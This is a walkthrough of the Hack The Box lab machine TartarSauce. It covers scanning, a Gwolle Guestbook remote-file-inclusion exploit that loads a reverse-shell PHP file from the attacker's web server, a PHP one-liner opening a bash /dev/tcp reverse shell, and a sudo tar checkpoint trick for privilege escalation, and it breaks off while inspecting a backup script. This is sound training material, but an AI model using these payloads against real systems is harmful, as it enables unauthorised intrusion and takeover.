This post is a walkthrough of the Hack The Box machine TartarSauce.

Hackthebox Tartarsauce Walkthrough Link to heading

tartar

Reconnaissance Link to heading

Initial Port scanning Link to heading
sudo nmap -sS -Pn -p- -T4 -sV -sC 10.10.10.88
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 5 disallowed entries 
| /webservices/tar/tar/source/ 
| /webservices/monstra-3.0.4/ /webservices/easy-file-uploader/ 
|_/webservices/developmental/ /webservices/phpmyadmin/
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Landing Page

nmap -p 80 -sC -sV -oN details.txt 10.10.10.88
nmap -p 80 --script vuln 10.10.10.88
Starting Nmap 7.91 ( https://nmap.org ) at 2022-03-23 20:46 EDT
Nmap scan report for 10.10.10.88
Host is up (0.044s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 5 disallowed entries 
| /webservices/tar/tar/source/ 
| /webservices/monstra-3.0.4/ /webservices/easy-file-uploader/ 
|_/webservices/developmental/ /webservices/phpmyadmin/
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Landing Page


PORT   STATE SERVICE
80/tcp open  http
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|_  /robots.txt: Robots file
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       http://ha.ckers.org/slowloris/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.

Nmap done: 1 IP address (1 host up) scanned in 321.09 seconds
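The five disallowed robots.txt entries from the scan are worth probing one by one. A quick loop like the following (a sketch; the status-code check is commented out since it needs the live box):

```shell
# Probe each disallowed robots.txt entry (paths taken from the nmap output above).
BASE=http://10.10.10.88
for p in /webservices/tar/tar/source/ /webservices/monstra-3.0.4/ \
         /webservices/easy-file-uploader/ /webservices/developmental/ \
         /webservices/phpmyadmin/; do
  echo "$BASE$p"
  # curl -s -o /dev/null -w "%{http_code} $BASE$p\n" "$BASE$p"   # against the live box
done
```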
Web pages found Link to heading

This is the landing page

tartar

Robots.txt

tartar

Monstra page. Of the directories listed in robots.txt, only this one loads for me.

tartar

Since we know the application and its version, it is worth checking for known exploits:

searchsploit monstra
------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                                                                            |  Path
------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Monstra CMS 1.2.0 - 'login' SQL Injection                                                                                                 | php/webapps/38769.txt
Monstra CMS 1.2.1 - Multiple HTML Injection Vulnerabilities                                                                               | php/webapps/37651.html
Monstra CMS 3.0.3 - Multiple Vulnerabilities                                                                                              | php/webapps/39567.txt
Monstra CMS 3.0.4 - (Authenticated) Arbitrary File Upload / Remote Code Execution                                                         | php/webapps/43348.txt
Monstra CMS 3.0.4 - Arbitrary Folder Deletion                                                                                             | php/webapps/44512.txt
Monstra CMS 3.0.4 - Authenticated Arbitrary File Upload                                                                                   | php/webapps/48479.txt
Monstra cms 3.0.4 - Persitent Cross-Site Scripting                                                                                        | php/webapps/44502.txt
Monstra CMS 3.0.4 - Remote Code Execution (Authenticated)                                                                                 | php/webapps/49949.py
Monstra CMS < 3.0.4 - Cross-Site Scripting (1)                                                                                            | php/webapps/44855.py
Monstra CMS < 3.0.4 - Cross-Site Scripting (2)                                                                                            | php/webapps/44646.txt
Monstra-Dev 3.0.4 - Cross-Site Request Forgery (Account Hijacking)                                                                        | php/webapps/45164.txt
Directory Scanning Link to heading
gobuster dir -u http://10.10.10.88 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.88
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2022/03/23 20:44:04 Starting gobuster in directory enumeration mode
===============================================================
/webservices          (Status: 301) [Size: 316] [--> http://10.10.10.88/webservices/]
/server-status        (Status: 403) [Size: 299]                                      

===============================================================
2022/03/23 21:01:06 Finished
===============================================================
nikto -h http://10.10.10.88                   
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.88
+ Target Hostname:    10.10.10.88
+ Target Port:        80
+ Start Time:         2022-03-23 20:57:37 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Cookie PHPSESSID created without the httponly flag
+ Entry '/webservices/monstra-3.0.4/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 5 entries which should be manually viewed.
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Server may leak inodes via ETags, header found with file /, inode: 2a0e, size: 565becf5ff08d, mtime: gzip
+ Allowed HTTP Methods: OPTIONS, GET, HEAD, POST 
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7881 requests: 0 error(s) and 10 item(s) reported on remote host
+ End Time:           2022-03-23 21:04:44 (GMT-4) (427 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
Login Credentials and Rabbit Hole Link to heading

The default login credentials (admin/admin) work. Based on the searchsploit results, I tried to upload a PHP reverse shell, but for some reason no file is ever uploaded. I tried both .php and .php7 extensions. This looks like a rabbit hole.
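For reference, this is the sort of minimal PHP payload I was trying to upload; the listener address 10.10.14.2:4444 is a placeholder, not from the box:

```shell
# Minimal PHP reverse-shell stub; 10.10.14.2:4444 is a placeholder listener.
cat > shell.php <<'EOF'
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.2/4444 0>&1'"); ?>
EOF
# A copy with an alternate extension, to test naive extension filters:
cp shell.php shell.php7
```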

I decided to dig into the /webservices directory found during the earlier scan instead.

gobuster dir -u http://10.10.10.88//webservices -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.88//webservices
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2022/03/25 21:54:56 Starting gobuster in directory enumeration mode
===============================================================
/wp                   (Status: 301) [Size: 319] [--> http://10.10.10.88/webservices/wp/]
More directory scanning methods to find subdirectories Link to heading
 
┌──(rocky㉿kali)-[~/hckbox/tartarsauce]
└─$ wfuzz -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --sc 200,301 http://10.10.10.88/FUZZ
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://10.10.10.88/FUZZ
Total requests: 220560

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                                                    
=====================================================================

000000001:   200        563 L    128 W      10766 Ch    "# directory-list-2.3-medium.txt"                                                                          
000000003:   200        563 L    128 W      10766 Ch    "# Copyright 2007 James Fisher"                                                                            
000000007:   200        563 L    128 W      10766 Ch    "# license, visit http://creativecommons.org/licenses/by-sa/3.0/"                                          
000000013:   200        563 L    128 W      10766 Ch    "#"                                                                                                        
000000014:   200        563 L    128 W      10766 Ch    "http://10.10.10.88/"                                                                                      
000000012:   200        563 L    128 W      10766 Ch    "# on atleast 2 different hosts"                                                                           
000000011:   200        563 L    128 W      10766 Ch    "# Priority ordered case sensative list, where entries were found"                                         
000000008:   200        563 L    128 W      10766 Ch    "# or send a letter to Creative Commons, 171 Second Street,"                                               
000000005:   200        563 L    128 W      10766 Ch    "# This work is licensed under the Creative Commons"                                                       
000000010:   200        563 L    128 W      10766 Ch    "#"                                                                                                        
000000009:   200        563 L    128 W      10766 Ch    "# Suite 300, San Francisco, California, 94105, USA."                                                      
000000004:   200        563 L    128 W      10766 Ch    "#"                                                                                                        
000000002:   200        563 L    128 W      10766 Ch    "#"                                                                                                        
000000006:   200        563 L    128 W      10766 Ch    "# Attribution-Share Alike 3.0 License. To view a copy of this"                                            

000001967:   301        9 L      28 W       316 Ch      "webservices"                                                                                              
000016812:   404        9 L      32 W       278 Ch      "xbg"                                                                                                      

000045240:   200        563 L    128 W      10766 Ch    "http://10.10.10.88/"                                                                                      

Total time: 2743.707
Processed Requests: 84630

  wfuzz -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hc 404 http://10.10.10.88/FUZZ/FUZ2Z
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://10.10.10.88/FUZZ/FUZ2Z
Total requests: 48646713600

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                                                    
=====================================================================

000000001:   200        563 L    128 W      10766 Ch    "# directory-list-2.3-medium.txt - # directory-list-2.3-medium.txt"                                        
000000003:   200        563 L    128 W      10766 Ch    "# directory-list-2.3-medium.txt - # Copyright 2007 James Fisher"                                          
000000015:   200        563 L    128 W      10766 Ch    "# directory-list-2.3-medium.txt - index"                                                                  
000000007:   200        563 L    128 W      10766 Ch    "# directory-list-2.3-medium.txt - # license, visit http://creativecommons.org/licenses/by-sa/3.0/"        
I aborted this run: with two wordlists it would need over 48 billion requests. Fuzzing directly under /webservices is far more practical:

  wfuzz -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hc 404 http://10.10.10.88/webservices/FUZZ 
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://10.10.10.88/webservices/FUZZ
Total requests: 220560

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                                                    
=====================================================================

000000001:   403        11 L     32 W       298 Ch      "# directory-list-2.3-medium.txt"                                                                          
000000013:   403        11 L     32 W       298 Ch      "#"                                                                                                        
000000011:   403        11 L     32 W       298 Ch      "# Priority ordered case sensative list, where entries were found"                                         
000000007:   403        11 L     32 W       298 Ch      "# license, visit http://creativecommons.org/licenses/by-sa/3.0/"                                          
000000014:   403        11 L     32 W       298 Ch      "http://10.10.10.88/webservices/"                                                                          
000000012:   403        11 L     32 W       298 Ch      "# on atleast 2 different hosts"                                                                           
000000003:   403        11 L     32 W       298 Ch      "# Copyright 2007 James Fisher"                                                                            
000000010:   403        11 L     32 W       298 Ch      "#"                                                                                                        
000000005:   403        11 L     32 W       298 Ch      "# This work is licensed under the Creative Commons"                                                       
000000006:   403        11 L     32 W       298 Ch      "# Attribution-Share Alike 3.0 License. To view a copy of this"                                            
000000002:   403        11 L     32 W       298 Ch      "#"                                                                                                        
000000009:   403        11 L     32 W       298 Ch      "# Suite 300, San Francisco, California, 94105, USA."                                                      
000000004:   403        11 L     32 W       298 Ch      "#"                                                                                                        
000000008:   403        11 L     32 W       298 Ch      "# or send a letter to Creative Commons, 171 Second Street,"                                               
000000793:   301        9 L      28 W       319 Ch      "wp"  
WordPress Link to heading

This turned out to be a WordPress site. I had spent quite a bit of time on the Monstra exploit, which in this case was a rabbit hole.

tartar

I ran a basic wpscan, which did not reveal any vulnerabilities:

┌──(rocky㉿kali)-[~]
└─$ cd ~/hckbox/tartarsauce                                                                                                                                             1 ⨯

┌──(rocky㉿kali)-[~/hckbox/tartarsauce]
└─$ wpscan --url http://10.10.10.88/webservices/wp/                      
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.18
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]n
[+] URL: http://10.10.10.88/webservices/wp/ [10.10.10.88]
[+] Started: Sat Mar 26 20:09:14 2022

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://10.10.10.88/webservices/wp/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://10.10.10.88/webservices/wp/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://10.10.10.88/webservices/wp/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.9.4 identified (Insecure, released on 2018-02-06).
 | Found By: Emoji Settings (Passive Detection)
 |  - http://10.10.10.88/webservices/wp/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=4.9.4'
 | Confirmed By: Meta Generator (Passive Detection)
 |  - http://10.10.10.88/webservices/wp/, Match: 'WordPress 4.9.4'

[i] The main theme could not be detected.

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:04 <=============================================================================================> (137 / 137) 100.00% Time: 00:00:04

[i] No Config Backups Found.

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Sat Mar 26 20:09:26 2022
[+] Requests Done: 164
[+] Cached Requests: 4
[+] Data Sent: 44.54 KB
[+] Data Received: 65.214 KB
[+] Memory used: 185.23 MB
[+] Elapsed time: 00:00:12

The normal scan did not reveal much, so I ran an aggressive scan, which took around 30 minutes. The relevant enumeration options from wpscan --help, followed by the aggressive scan results:


┌──(rocky㉿kali)-[~/hckbox/tartarsauce]
└─$ wpscan --help                                   
_

    -e, --enumerate [OPTS]                        Enumeration Process
                                                  Available Choices:
                                                   vp   Vulnerable plugins
                                                   ap   All plugins
                                                   p    Popular plugins
                                                   vt   Vulnerable themes
                                                   at   All themes
                                                   t    Popular themes
                                                   tt   Timthumbs
                                                   cb   Config backups
                                                   dbe  Db exports
                                                   u    User IDs range. e.g: u1-5
                                                        Range separator to use: '-'
                                                        Value if no argument supplied: 1-10
                                                   m    Media IDs range. e.g m1-15
                                                        Note: Permalink setting must be set to "Plain" for those to be detected
                                                        Range separator to use: '-'
                                                        Value if no argument supplied: 1-100
                                                  Separator to use between the values: ','
                                                  Default: All Plugins, Config Backups
                                                  Value if no argument supplied: vp,vt,tt,cb,dbe,u,m
                                                  Incompatible choices (only one of each group/s can be used):
                                                   - vp, ap, p
                                                   - vt, at, t
        --exclude-content-based REGEXP_OR_STRING  Exclude all responses matching the Regexp (case insensitive) during parts of the enumeration.
                                                  Both the headers and body are checked. Regexp delimiters are not required.
        --plugins-detection MODE                  Use the supplied mode to enumerate Plugins.
                                                  Default: passive
                                                  Available choices: mixed, passive, aggressive
        --plugins-version-detection MODE          Use the supplied mode to check plugins' versions.
                                                  Default: mixed
                                                  Available choices: mixed, passive, aggressive


[!] To see full list of options use --hh.

┌──(rocky㉿kali)-[~/hckbox/tartarsauce]
└─$ wpscan --url http://10.10.10.88/webservices/wp/ -e ap --plugins-detection aggressive
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.18
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]N
[+] URL: http://10.10.10.88/webservices/wp/ [10.10.10.88]
[+] Started: Sat Mar 26 20:17:27 2022

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://10.10.10.88/webservices/wp/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://10.10.10.88/webservices/wp/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://10.10.10.88/webservices/wp/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.9.4 identified (Insecure, released on 2018-02-06).
 | Found By: Emoji Settings (Passive Detection)
 |  - http://10.10.10.88/webservices/wp/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=4.9.4'
 | Confirmed By: Meta Generator (Passive Detection)
 |  - http://10.10.10.88/webservices/wp/, Match: 'WordPress 4.9.4'

[i] The main theme could not be detected.

[+] Enumerating All Plugins (via Aggressive Methods)
 Checking Known Locations - Time: 00:36:01 <========================================================================================> (96368 / 96368) 100.00% Time: 00:36:01
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] akismet
 | Location: http://10.10.10.88/webservices/wp/wp-content/plugins/akismet/
 | Last Updated: 2021-10-01T18:28:00.000Z
 | Readme: http://10.10.10.88/webservices/wp/wp-content/plugins/akismet/readme.txt
 | [!] The version is out of date, the latest version is 4.2.1
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://10.10.10.88/webservices/wp/wp-content/plugins/akismet/, status: 200
 |
 | Version: 4.0.3 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://10.10.10.88/webservices/wp/wp-content/plugins/akismet/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - http://10.10.10.88/webservices/wp/wp-content/plugins/akismet/readme.txt

[+] brute-force-login-protection
 | Location: http://10.10.10.88/webservices/wp/wp-content/plugins/brute-force-login-protection/
 | Latest Version: 1.5.3 (up to date)
 | Last Updated: 2017-06-29T10:39:00.000Z
 | Readme: http://10.10.10.88/webservices/wp/wp-content/plugins/brute-force-login-protection/readme.txt
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://10.10.10.88/webservices/wp/wp-content/plugins/brute-force-login-protection/, status: 403
 |
 | Version: 1.5.3 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://10.10.10.88/webservices/wp/wp-content/plugins/brute-force-login-protection/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - http://10.10.10.88/webservices/wp/wp-content/plugins/brute-force-login-protection/readme.txt

[+] gwolle-gb
 | Location: http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/
 | Last Updated: 2021-12-09T08:36:00.000Z
 | Readme: http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/readme.txt
 | [!] The version is out of date, the latest version is 4.2.1
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/, status: 200
 |
 | Version: 2.3.10 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/readme.txt

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Sat Mar 26 20:53:45 2022
[+] Requests Done: 96385
[+] Cached Requests: 31
[+] Data Sent: 28.066 MB
[+] Data Received: 12.944 MB
[+] Memory used: 359.363 MB
[+] Elapsed time: 00:36:18

The aggressive scan identified three plugins: akismet, brute-force-login-protection, and gwolle-gb.

Initial Shell Link to heading

Searchsploit shows an exploit for one of these plugins:

┌──(rocky㉿kali)-[~/hckbox/tartarsauce]
└─$ searchsploit gwolle 
------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                                                                            |  Path
------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
WordPress Plugin Gwolle Guestbook 1.5.3 - Remote File Inclusion                                                                           | php/webapps/38861.txt
------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
Papers: No Results

┌──(rocky㉿kali)-[~/hckbox/tartarsauce]
└─$ locate 38861.txt
/usr/share/exploitdb/exploits/php/webapps/38861.txt

┌──(rocky㉿kali)-[~/hckbox/tartarsauce]
└─$ cp /usr/share/exploitdb/exploits/php/webapps/38861.txt .

┌──(rocky㉿kali)-[~/hckbox/tartarsauce]
└─$ cat 38861.txt                                           
Advisory ID: HTB23275
Product: Gwolle Guestbook WordPress Plugin
Vendor: Marcel Pol
Vulnerable Version(s): 1.5.3 and probably prior
Tested Version: 1.5.3
Advisory Publication:  October 14, 2015  [without technical details]
Vendor Notification: October 14, 2015
Vendor Patch: October 16, 2015
Public Disclosure: November 4, 2015
Vulnerability Type: PHP File Inclusion [CWE-98]
CVE Reference: CVE-2015-8351
Risk Level: Critical
CVSSv3 Base Score: 9.0 [CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H]
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )

-----------------------------------------------------------------------------------------------

Advisory Details:

High-Tech Bridge Security Research Lab discovered a critical Remote File Inclusion (RFI) in Gwolle Guestbook WordPress plugin, which can be exploited by non-authenticated attacker to include remote PHP file and execute arbitrary code on the vulnerable system.

HTTP GET parameter "abspath" is not being properly sanitized before being used in PHP require() function. A remote attacker can include a file named 'wp-load.php' from arbitrary remote server and execute its content on the vulnerable web server. In order to do so the attacker needs to place a malicious 'wp-load.php' file into his server document root and includes server's URL into request:

http://[host]/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://[hackers_website]

In order to exploit this vulnerability 'allow_url_include' shall be set to 1. Otherwise, attacker may still include local files and also execute arbitrary code.

The advisory describes a remote file inclusion. I edited pentestmonkey's PHP reverse shell with my IP and port, renamed it wp-load.php, and started a web server on the Kali machine. This works without any login credentials for the WordPress site.
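The payload preparation boils down to pointing the shell's `$ip` and `$port` variables at our listener. A self-contained sketch (the printf stub stands in for the real pentestmonkey shell, which ships on Kali under /usr/share/webshells/php/; 10.10.14.17 is this engagement's attacker IP):

```shell
# Stand-in for php-reverse-shell.php so these commands run anywhere;
# only the $ip/$port lines matter for the edit.
printf "\$ip = '127.0.0.1';\n\$port = 1234;\n" > wp-load.php
# Point the shell at our listener address (tun0 IP on this engagement)
sed -i "s/127\.0\.0\.1/10.10.14.17/" wp-load.php
grep '\$ip' wp-load.php    # now reads: $ip = '10.10.14.17';
```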

└─$ cat wp-load.php                     
<?php
// php-reverse-shell - A Reverse Shell implementation in PHP
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net
//
// This tool may be used for legal purposes only.  Users take full responsibility
// for any actions performed using this tool.  The author accepts no liability
// for damage caused by this tool.  If these terms are not acceptable to you, then
// do not use this tool.
//
// In all other respects the GPL version 2 applies:
//



└─$ python -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.10.88 - - [27/Mar/2022 21:05:50] "GET /wp-load.php HTTP/1.0" 200 -

Accessing the URL below gives us a reverse shell. Make sure netcat is listening first:

http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://10.10.14.17:8000/
rlwrap nc -nvlp 1234
listening on [any] 1234 ...
connect to [10.10.14.17] from (UNKNOWN) [10.10.10.88] 47994
Linux TartarSauce 4.15.0-041500-generic #201802011154 SMP Thu Feb 1 12:05:23 UTC 2018 i686 athlon i686 GNU/Linux
 21:09:13 up  1:01,  0 users,  load average: 0.00, 0.01, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
whoami
www-data
python -c 'import pty; pty.spawn("/bin/bash")'
www-data@TartarSauce:/$ 
Privilege escalation to user onuma Link to heading

Running the sudo -l command shows we can run /bin/tar as the user onuma without a password. Checking the GTFOBins site, I found this command for privilege escalation.

sudo -l
Matching Defaults entries for www-data on TartarSauce:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on TartarSauce:
    (onuma) NOPASSWD: /bin/tar
sudo -u onuma tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
<ll /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh                
tar: Removing leading `/' from member names
whoami
whoami
onuma
python -c 'import pty; pty.spawn("/bin/bash")'
python -c 'import pty; pty.spawn("/bin/bash")'
onuma@TartarSauce:/$ 
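The GTFOBins trick works because GNU tar's `--checkpoint-action` executes an arbitrary command each time a checkpoint is reached, and under `sudo -u onuma` that command runs as onuma. A harmless local demo, with `echo` standing in for `/bin/sh`:

```shell
# tar fires the checkpoint action while archiving /dev/null; the exec'd
# command inherits tar's privileges, which is the entire escalation.
tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec='echo checkpoint fired'
# prints "checkpoint fired" (possibly more than once)
```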

After seeing backup-related content in the home folder, I ran pspy to check for any process running at regular intervals.


2022/03/27 21:39:01 CMD: UID=0    PID=3839   | /bin/sh -e /usr/lib/php/sessionclean 
2022/03/27 21:39:01 CMD: UID=0    PID=3838   | /bin/sh -e /usr/lib/php/sessionclean 
2022/03/27 21:39:01 CMD: UID=0    PID=3843   | sed -e s,@VERSION@,7.0, 
2022/03/27 21:39:01 CMD: UID=0    PID=3842   | /bin/sh -e /usr/lib/php/sessionclean 
2022/03/27 21:39:01 CMD: UID=0    PID=3841   | /bin/sh -e /usr/lib/php/sessionclean 
2022/03/27 21:39:01 CMD: UID=0    PID=3844   | pidof 
2022/03/27 21:39:01 CMD: UID=0    PID=3845   | /bin/sh -e /usr/lib/php/sessionclean 
2022/03/27 21:39:11 CMD: UID=0    PID=3848   | gzip -d 
2022/03/27 21:39:11 CMD: UID=0    PID=3847   | /bin/tar -zxvf /var/tmp/.c4d57a7eb1386f56d7a66495edc4b30b99595a14 -C /var/tmp/check 
2022/03/27 21:39:12 CMD: UID=0    PID=3850   | /bin/bash /usr/sbin/backuperer 
2022/03/27 21:39:12 CMD: UID=0    PID=3849   | /bin/bash /usr/sbin/backuperer 
2022/03/27 21:39:12 CMD: UID=0    PID=3851   | /bin/mv /var/tmp/.c4d57a7eb1386f56d7a66495edc4b30b99595a14 /var/backups/onuma-www-dev.bak 
2022/03/27 21:39:12 CMD: UID=0    PID=3852   | /bin/rm -rf /var/tmp/check . .. 

Let's see what the program "/usr/sbin/backuperer" does:

cat /usr/sbin/backuperer
#!/bin/bash

#-------------------------------------------------------------------------------------
# backuperer ver 1.0.2 - by ȜӎŗgͷͼȜ
# ONUMA Dev auto backup program
